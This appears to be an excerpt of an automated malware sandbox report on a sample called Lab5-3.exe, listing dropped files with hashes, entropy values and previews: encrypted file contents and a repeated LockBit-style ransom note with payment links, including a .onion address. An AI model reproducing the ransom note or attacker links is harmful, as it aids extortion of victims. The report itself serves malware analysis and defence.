                                                                                                          Preview:d,~......+..^<P:.......k..e.Kd.!...(#.HN.@/&.k.o?A.&=...nI.......2..6...*M...5........J..$.....G..*ss.../.8-.;mh...6.%.f.)z...=.H.oy=5..".5{....B:.....x...a......Z./.S..l.`z.%].&..._.l.5m.#.%t.....1...s.-.!...J. .v..V...If!ey..lQ.\..|......b...S..FyH.>.-..5./..q.i;~C;.....-.$....u....}/#. C..B...d..0e..8\._x..X....)..X.FS+J|....@.lg.......c...'0..X......V4.:......A.m...W-...DP..&..a..D.6....v.zp.....w..........].5/..G...;.lY..CEuC.ctR.....|.7....M.H.G._..H.....S-........3.Q..hF!<.....>...\..R..2......$t9[.C..{S.....(......O<..~eM@.q....y...N..+.e.-......Q...3.@.;...kL..Q....J....,'N.;.ta\...F..m..%UP....1..?..n..x.TpDaK.8r.6G.../..Sw.*.;..1.....6+.H.NX@.+WR..<<.J......;.-...9..J.E.M...88.|"<+.].s....R.::p.E.X*.....@SkC........w<....s..a....G..}H..\.'........;-_z7........\Zu).*/.v5...p....)..1..Y....>h..vt.d..?...dK......;..l>.9-.}........."...T.6........~..r?1).A%KB....|...i<.......?.m.k....'p.V...]?_.........Oi.......4.^.p.&...,..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5360
                                                                                                          Entropy (8bit):7.960743084053096
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:xbhiP+EEjsR3AveffTN008bVgzWmaHt30+5sYThwED/1Gx0uKeY2ElUJ:xbhg+tY9+0y0j9aNEQsT0Cb
                                                                                                          MD5:C152DA2AD17974A4586C102335E5D524
                                                                                                          SHA1:7624278A8ADFD7CE3FBFAE4A06F1A5CE85AFCD05
                                                                                                          SHA-256:3246E98B9FEDC0D3C10E97D70CC91175D0EBB88678F8EAB6B47C9FE6628DB4EB
                                                                                                          SHA-512:0114325F2E860EC86B93D77C1EFD1F1C94D4D311652826DE0F630DDA9E128B04026FCF8BECC3AB51746D024104035D1C53F585AAC064A117E310CCB223F60776
                                                                                                          Malicious:false
                                                                                                          Preview:.h.4p.!G..,..4P..Y..l{........M....WLp....gx&g1B.1..Qj...KE..@c.!..x\^<|....@.A.'.&~+:?|..D....P..*...(.=.+h.s.Y.'5.........9..&...@fJ...0....I/..1..Fj5. .^}...4.&=....w....)......u~b.;oj.(...........{2.B.8$..<.=..|.6X$.......2..$..`...H.d..vA.j....I.}.Ja.i.vY..c+....l...e.N...{.rx.lu......5.I|.p...Q..k..|.l..1.....d&..T.8<z........KK.7.t.....2+.........r`...+E......- 1.r.v....9..C...g.*...D..UT.l.[.:.L../..Z..~r,N!.n3......}.].}..s..v.....4e[..j|......b]..`.W.$..B....~2.z..w...1k.m`..|.U.....v...h(...g.zt..#.d-...t...LC.p...uE...Z....#..<..(.QY.["..W..;..M...<.XB..E.pq..hgQ.E.[.y.-(z....o...`.\2...S.{^....c.A........Dr.&..\..|...x.K..U..z..Y......*w:...k..,. ...r...~.W<Qan.....9j...&.>......q..Sl.....J .....T..9.i/....SF_F...b ..0.....J .PG..b,.L.{$w .CD.)!.8...s...k.,n.....V.Li..V..s..(....ZL...2....A....q...x....A$=.0.q.....l.l&w.B.[Q.~a...9.....H*.BKwT.e.J=.....V.$....S...U...zh.(.A...e.V..y....%M.FdB........k."W...]/..Y....<..7-.h[.?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5216
                                                                                                          Entropy (8bit):7.962704645137702
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:cSPKQttvjOBSURNG1Z5DTtWRfLozc9Vj8HE1mGx0uKeY2ElUJ:hKQvLOBlbG7QDYc998k70Cb
                                                                                                          MD5:9E2D330CD94E65AB79317ED65D8C5728
                                                                                                          SHA1:3D7ABE7A35F5827DD568A6A2B8B41DFCC25E481C
                                                                                                          SHA-256:E3AE710695EFBE757D7AC324876D2B6D5FF1AC23B5D109FDD003A166B440E82C
                                                                                                          SHA-512:A49786D94203031056665D41CA29CE79D0AF06A895E014523436D111D79966D256330CA5A634CEF40AE93A52C52FB6BB415D2F4DD97EF030ED145E6EEAFB6103
                                                                                                          Malicious:false
                                                                                                          Preview:.Kj...v.......p.M'f.....Z.k.......w.\.:..?+..1...n....1...(.qg].l..-....Cl..C.F..o#`.?q....F.....&..XErm..0..)$..A.,){.;...."..E[.....-{..f...Z.-.(/.....f...;..}*D..H..'.e.D...>...........ed...bI..6_..,. ..m..GC9...].`Qy.G.`.l..d>..x...e.a.](...).l..0..)..Eg.Y0.C......2.@..5.5j.4g?..%...c..-..,...5..HU.7.cRI. ...i\......B..Ep......G..0..d.E.X.....;Z.Y..3..n.I-.H.(eY.L.k..w......W..,....S.7.|..Gu..n..%..e....#S..g..s.....StM.0....VO/c5.ED..%.8...o..Sj.DP..sQ.(..a.....=j...gJ...v7...I.8.L...5I>..........v.d.u.y.(.,....&..m.%.C.....{.{..I7......rM....;no64zfu{.?...i#.3.`.Y.z@2..F2...i..=R.Pb... YVp.}2p..........A.h.x...h.K...ae..3].....F....1......]iG.(W2.$L.i.U....b^.Z.0. yWc.S.t.%..2!.E71x.....>.g....&.%dH....n..:.`.....C........'R.....OkX..Pidh..;].Ue..&..C!c.\...(......5..2S.z.^....v..H..I....%..;v...s_~Y.<..c=..Y.l..Q.h~B..3..V+.Rx}.S..)rF..y.0/t.m>..x.....P~......?..=R....2..3t..hE..F...P..7,J...nQ.....za.T...l.}...tr{.I@:..d 'r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5392
                                                                                                          Entropy (8bit):7.970004926525249
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:okVbJX25xF7kOiEoy+sUMlo8zoib2qL0lwNDV09AnTvtam2a/wtghGx0uKeY2Elk:9bR2FJDBlo8zRb2rlwNDV0ATwtga0Cb
                                                                                                          MD5:98ECACD44FB3870B0C2C9809F13A36DE
                                                                                                          SHA1:CA4BA74E613D75142370D85DF170190445983D87
                                                                                                          SHA-256:263485BFC22E6CC8F7E5A37175D47309FC07F079754B64FAED4985E7132A8DCA
                                                                                                          SHA-512:A010536C91DA8FB6B6D5B3CCEBCA18E838A7949EED0472EB518FB6961251F28FB8B435D6BD373BFD774EC986B7D10FC86E188F3FC39CBC491F44E3CFC9B1C757
                                                                                                          Malicious:false
                                                                                                          Preview:.....H.w..=?...h.z>...r:......M."...%..L....NJ.#...4w....>.yV.L...>.\F.|2~|...bHI....cxx.*D;..?..*...h.. .J......G.Uf).^.Q.@.R@.`.'..v.............k..2.G(.d..T..-4D.m.*.....-.c6V.V.J......"..)S......f....@H.uMwV...z...^...R..^Z..D....[5."..&..i........u..f.....;!..V.....q..M..6........>.hw!..c..i.q...9...1.g....~..9..R*T.p..E....V0q.Q....%.k(.H..C....n.#b....b.OzO....".369.X.,.*/..YR1uq.T.2.[....4<.M....g..k*.S.....y..u...).TG...`....b(.F.1..f.<,..2M.m6'<Wr.e.|}.,..%.!.....0..xi|vfi...7.<.uf..B...i8|...V.,.....<j..8._Y.2.S....v.B.5N....5qM.G.J...C.... ..g.g.....#.h.I..UL...D...A...;.7.o..V.H,....=...C%..R..!.O^F.w.@.4-...h."J../...A.u&}..T.....y.AH..x.m.S.._....):V.d....w.`.;..J.s.y 9.C.J.y.~t..I..&...%..7.=O.q.A..=...5.l.K...9..~9.Zw[.u..4.U.<,"..A.g..$......#.*.2Q.K..]..~=2......<b.8.....2...0........6..MG.ol..x]..fi.....l....!.F.&A|..!..8.0.0.Pd......|.B#...u.g.o8:.-jX..<..?e....s.L.r.....w..3}.:%.3n.>.#...P>.Z..%........K..i.w.p..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5120
                                                                                                          Entropy (8bit):7.961902584249092
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Kh1fcW8KTjdzkku5H0v8mq9tOozwvFUavT6WOiQ+GEF8u+xB9Gx0uKeY2ElUJ:Kh1fR8Kvdzb6qq9tnwvFhrSiiju+xBGZ
                                                                                                          MD5:6A086F5F0ACA4898BF35AEBD039E80E6
                                                                                                          SHA1:6823E9DE684922CD510C247A9F81C0A02C1A8D04
                                                                                                          SHA-256:C1AA9DACA9D8B0EEEBEE783353918232F65405C478B5C079FD2D01DFAC5D432B
                                                                                                          SHA-512:CD915D110E783A24A642148E178C969C854DACE032B9180471C3D5EA5FA54AEDA7D8C37983519E98CA12E0CE08122E120C1BFDDBD1A7FD8FAAA0A16ED05A2247
                                                                                                          Malicious:false
                                                                                                          Preview:;....#.%8.K....V]}..c.?..L5Pg.doO.jf].~.*..+co.k..U.S.H.y*xZ...W3*..0H..M"^6.YU_...~.....S4....G*.....x..+.&V..lB,........%.A.*L.....kO.].-_+(.........i1....D.X3..b.rM.....[....[p.|.c.....w:....-...Ip....4...Z4>..2.%9....>T<U.r;.........O.(~.^.3...o..f>m........U.....X...ji.~.*..`...R....4n...]..m:.].<....0.M.....L.F<..s.{<8...h.tB....{P.m..].R.<.l2y].W.c.....Q.y[.?......u|....,GP...;o.E.O~.........,3.N.6\.o.m.$3..9...N..bo.$s^rm....R.^=kk......Uk..{.+.'.b..<...!....o.5.....g...&I...*..I.-.bD...n..w.;.7..........L..{.c.T....R..r@.d.8?.......UW..XM.D..PG.3..18.R.Qx'.]...(...K...h....Xn....s.!.v...0).....=_....f.<h.....w..D..UUQU.A/_CW.........sG.........U. ...l..I.........a7V.....]j=.Q6;.U.2i .".....Oe}......o.v.y..Pr.U..D4..}...d_l.&<32!...-.%H.....0.R.{z.gL/...V[TXA....KLy.-Q.....M..g.Zq.M...H.h.L.........)C.q...........C&..L...#8.%_...k..@......s...2J.....y.^...../Se......:%.D..c...\.o/)....g...A.<..K.}@.{w...0..n...~.?........D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6032
                                                                                                          Entropy (8bit):7.968471238981783
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:8MS11eFSpmRP9Z0xui+yymsyt8UCi8PV/5sD7nFtW4NLKE4nxePxBSa7xPMGx0ut:8MS1KSpm50wkZFV8P4DJtKE4n8PxBSAJ
                                                                                                          MD5:45675913F06E6F3570CC82ED9A6E4880
                                                                                                          SHA1:2FC30DF2F28CF907F3B2E3F96AB90D32D355C20C
                                                                                                          SHA-256:8AD0D634AD63077DD8D9E2D9E1B145462FEA000F079CEF5706FEFB97AAC1CD88
                                                                                                          SHA-512:C896F76D0D028A81A2A758BB0235DC5D310AA9D29C60E0B6F86181C205E00CDAD98C05114E07D937B1295565DBFD9114E398515224393F36C83AE9A4ACEBD24A
                                                                                                          Malicious:false
                                                                                                          Preview:].{...\..e.C.*.HU>QP..cVq}..l..C...Y.?>$I...i...=w...7....g......Y.K.m.3.&..-d...a\.E?.....o......93.........K..Y....F...b..M....@}n ...4.>z..$.eK......1.x...x......9.M..d....@<..[.W.=..0!.9.h..bs2......1.N...k.cH.!../......;!_..3....[...Oq"..`:.....Cp.pp.h.B......u..M?.].p.y%.........N.P..=.l.h..:..^c....e...D6k...;..}..W.4...G...!E.."...fl..Sx...p..#.1X..a..Av.&n.9..3......7p.......(... ..N.".....aI%s...m..B.t.1.j....-.....O#.t.......9..Y..@>.p'..p...n..e6fa..p@...p.2.. y.KqvTW...P..~C....WE....^.^.\\V..^q.r.....=R....{....(.06..<.WL]H.-...H#.n.J#.....5........U{..83.%J.t.M...({..$.';L&..._nZ...g...@.4I.o.B>.B.2n1..._&.R........]..".>.......).N......q.....~v..#t.<.@s..&..w.I.."s...x.Gj..P..s.....L....,..K..$..,R...m..p.\..k.y...-........%..`.A......\i.m.......&....3.3R.p..@.D...u.b...}........o..ja......vIB.......5....P.....}....).......8...4_w...K.2.......w#.>.u.@..G.bK.G.*:...R.O.z...c.6.P...-|.~".x.++.0j..Pu..cX.L
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5424
                                                                                                          Entropy (8bit):7.964032849555172
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Dz6M13wKMKSKHhWlxGQDqx+xmJCcmscOnvYKKeGx0uKeY2ElUJ:D2Ih5S+hOxXOBJDmscP0Cb
                                                                                                          MD5:2E1E42CACE54C8003EEBD4931B004FE5
                                                                                                          SHA1:5CE81C124A08668C3BAF1D2C7D4FF05492B798C8
                                                                                                          SHA-256:A98C1AC412CA2801B8B12BD9B920159873CE3ED2E53D471B396668123B95CCCB
                                                                                                          SHA-512:AFFEF5A6A7056C72ED0A0140DE9EED50C434CC3FB99A703576DC91845230CB9BEFA1E2B1B249F661929BF9520F9B1C088A0A3F5B97138492D00D4F904223A88A
                                                                                                          Malicious:false
                                                                                                          Preview:...|.M.....,].....<h..B.....C|U.B..T.?.,.................+....#.F....j..e{n.^[.6..7.............EpX.[`.4..+.D.%K...;.v4DC....({..S....YR!.....0Q.kK..`.CA~.2...,..x...M.4....C...i..Nz..l9..~!j.).,.O...r..8.O...o.MI-,s.$$.R..@.....H>W....\........^K".....+.zq..W.v9..3k>...X....!S...w...#...92m:.6TX...Q....?.1...0...(....k\rv..@..U^....=...|....."i.&.).Nt.....p.B."vbOh5......Z.7..!.....a..t?..F......q...f...m._..2..N*z...Ql}z.C.p..V%9....).....$...c.C...<..C1...X..o..Ub.n6...B.....}...S..5..r0W..v.B......<.e.(.R...EwF....Xy.~....R.X.2&..DJ..`.]u:..w&.......0...D$G.J.w.)=6.v..n.^..+.......d5.........\zv.g..@<B.S.".%F.~....8...Z...F9.;..3..{O.8...d.....+..Fr... _...y..s.fN.......Lc' ..}.....4A.......Z =H.....<.gI[...4u.u...B2..s..3$.....C...XB1,..N....D$..Y.!....~h.4@R}.....t+..~...TmW.O..x.......h.O....f%..p..4.!bY..A...:p...z..IAo...~.@.l....i.X..]f..7.?.xrL{G...W*\..[..D..N.....I._Qy.#.~'...k....[~&M.C........`vU...6&...MC.hv....... ....B.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5312
                                                                                                          Entropy (8bit):7.964484690745788
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dYTfgdHkv7o6VW1HVWZ1gnrwSRNvT14YJbeZ6MS9pCD9rksUyP4dVpnvGNkLAGxZ:TM7ZW1H8H4Zb4HlD9pP8VpvGNcz0Cb
                                                                                                          MD5:CFFCCF7A85A8581F7C80A4B193DD4512
                                                                                                          SHA1:76EBF90458C76D9B4812ABCF859B2D3E6C457EFB
                                                                                                          SHA-256:382C94411FF67EBD2001AB065C4935536C6CC979D888BC978007CADA46987F85
                                                                                                          SHA-512:7A47CC413AD7AAB64D66768B503C338621785E6D28AA9B9DF730BDBD986C6E3ED9013635D80F19B4ACFEEA8A01E7767F678359FA1E8366D10DF09F173CF4E0D4
                                                                                                          Malicious:false
                                                                                                          Preview:H.#.S...=......3-g->.s...,K$....J..<..p)...c!..U...j.dj..>M.i..I.D9m!..>..[.6.V..q9...(.d..C...$.y:....U....K.\.../...h.."..J..$...:.o......^.......{.....a^..G...n....}b.r.Z@...|eF.#....'..`.....+..I.,~... 5..e^..Mt..L.....d&.R.w...."jN.D...)t...|..x0T.....-:.#...4.PgW".U.n........3=.k........4..G. 4k..5>E.J;.....c'....U.Q,.3..2....>...sUV.`YJ.t..J#R[....`U..H.(..8,+..I..../.[...8scH..:....8..>[.$.?.M....9..d.....@..A......}..O..y....ri....0...1.Q....Tsi...S..."f.....0R..~R..F.;..k...../..-U.. ...e.e.U..<.xN...#b_...b*VlHd..Bc..W.0.....GKT@O.d.k....~.xA......./*.P..f.@...|.u.9g....{.C...2.......G..h........./.s.&.Y..F.......#...m.Q^...4....MtAm<.....;}+.J...x>...3...k@.... *....+.n....y.|.p....oQ0..Ee....3.0.C.V.6VP.]."..D+...y...J:..R.?...e.|;..VaM....p.h..{mR7...........l...&..U..m1.KJN....fk.&.A.......&.......#..D.b.........W...;...3.5s|......e.vp_..4..#q.....uxA...Z....PL.Z..V...........X. 5........$..F...'D{..!.B.Q..?.1.t.1.3x..4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
